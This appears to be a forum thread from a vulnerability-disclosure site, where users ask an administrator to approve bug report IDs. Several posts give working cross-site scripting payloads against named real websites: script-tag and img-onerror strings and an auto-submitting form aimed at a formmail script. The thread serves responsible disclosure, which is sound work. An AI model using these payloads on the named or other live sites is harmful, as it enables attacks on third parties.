Manual Approval Thread
-
- Posts:3
- Joined:Tue Dec 22, 2020 4:32 pm
Hello administrator, how are you?
Can you approve this report?
ID: 1942173
Thank you very much for your attention!
Can you approve this report?
ID: 1942173
Thank you very much for your attention!
Re: Manual Approval Thread
approved
Re: Manual Approval Thread
1939986 - click the fb button
Re: Manual Approval Thread
Hello, please approve ID 1945783
Visiting the url https://www.pap.fr/bailleur/calcul-revi ... NBUGBOUNTY') &jour_signature=1&loyer=&mois_signature=1&submit=1 and then clicking in the box marked as 'Votre E-mail :' will trigger XSS as per screenshot.
Visiting the url https://www.pap.fr/bailleur/calcul-revi ... NBUGBOUNTY') &jour_signature=1&loyer=&mois_signature=1&submit=1 and then clicking in the box marked as 'Votre E-mail :' will trigger XSS as per screenshot.
- Attachments
-
- Screenshot from 2021-03-09 15-18-36.png (73.14KiB)Viewed 1994 times
Re: Manual Approval Thread
Hello, please the following ID's:
1946361 The payload '-->"></script><script>alert(1)</script>"> can be entered into the search box on the url https://jobs.world.edu/ and you will get the following xss triggered.
1946360 The payload '">><marquee><img src=x onerror=confirm(1)></marquee>"> can be entered into the Ask Questions fields and after selecting a category and pressing the 'Ask' button the xss will be triggered Many thanks,
1946361 The payload '-->"></script><script>alert(1)</script>"> can be entered into the search box on the url https://jobs.world.edu/ and you will get the following xss triggered.
1946360 The payload '">><marquee><img src=x onerror=confirm(1)></marquee>"> can be entered into the Ask Questions fields and after selecting a category and pressing the 'Ask' button the xss will be triggered Many thanks,
Re: Manual Approval Thread
Hello please approve ID 1946511.
You can get xss with following data:
data:text/html,<!-- --><form method='POST' action='http%3A%2F%2Fwww.gongol.net%2Fcgi-sys%2Fformmail.pl'><input name='email' value='speedinquiries%40gongol.net'><input name='env_report' value='REMOTE_HOST'><input name='recipient' value='internetsales%40gongol.net'><input name='redirect' value='http%3A%2F%2Fwww.gongol.net%2F'><input name='reply%20email' value=''><input name='required' value='%26lt%3Bimg%20src%3Dx%20onerror%3Dalert%28%29%20'><input name='send%20this%20person%20an%20e-mail%20telling%20them%20where%20to%20find' value=''><input name='subject' value='Speed%20request%20for%20information'></form><script>document.forms[0].submit()</script>
When page automatically refreshes you get the xss triggered: This is a problem with the formmail.py configuration with the site.
You can get xss with following data:
data:text/html,<!-- --><form method='POST' action='http%3A%2F%2Fwww.gongol.net%2Fcgi-sys%2Fformmail.pl'><input name='email' value='speedinquiries%40gongol.net'><input name='env_report' value='REMOTE_HOST'><input name='recipient' value='internetsales%40gongol.net'><input name='redirect' value='http%3A%2F%2Fwww.gongol.net%2F'><input name='reply%20email' value=''><input name='required' value='%26lt%3Bimg%20src%3Dx%20onerror%3Dalert%28%29%20'><input name='send%20this%20person%20an%20e-mail%20telling%20them%20where%20to%20find' value=''><input name='subject' value='Speed%20request%20for%20information'></form><script>document.forms[0].submit()</script>
When page automatically refreshes you get the xss triggered: This is a problem with the formmail.py configuration with the site.
Re: Manual Approval Thread
Hello,
Please approve ID 1947591.
You can add the payload </script><script>alert(1)</script>"> into the search fields and it will trigger xss. Many thanks
Please approve ID 1947591.
You can add the payload </script><script>alert(1)</script>"> into the search fields and it will trigger xss. Many thanks
Re: Manual Approval Thread
Hello, please (Improper Access Control (IAC):
1947620
1947623
1947624
1947625
1947626
1947638
1947641
1947620
1947623
1947624
1947625
1947626
1947638
1947641
- PC_Mechanic
- Posts:31
- Joined:Sat Mar 21, 2020 6:33 pm
Re: Manual Approval Thread
Hi Admin
Please approve 1922509
This is 100% reproduceable
Please approve 1922509
This is 100% reproduceable
Re: Manual Approval Thread
approved
Who is online
Users browsing this forum: No registered users and 2 guests